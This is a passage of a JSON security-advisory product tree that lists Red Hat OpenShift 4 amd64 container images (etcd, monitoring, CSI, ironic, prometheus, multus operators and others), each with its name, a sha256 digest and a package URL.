"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3Ae6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565214"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3A73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564931"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3A54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606566"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Ad1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3A0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-policy-controller-rhel9@sha256%3Aa252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605144"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-storage-rhel9-operator@sha256%3A90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606817"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-version-rhel9-operator@sha256%3A4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product_id": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-configmap-reloader-rhel9@sha256%3A324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606351"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564694"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3Afcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572853"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3A8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3A96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563629"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3A3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557766"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3Abe5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564147"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3Adf471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563664"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563562"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775629870"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Acba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3Ac948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604398"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3Aa362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Adae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3A4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-rhel9@sha256%3A46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557454"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-agent-rhel9@sha256%3Add33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-machine-os-downloader-rhel9@sha256%3Ae33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ironic-static-ip-manager-rhel9@sha256%3A02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Ab71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3A97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"product_identification_helper": {
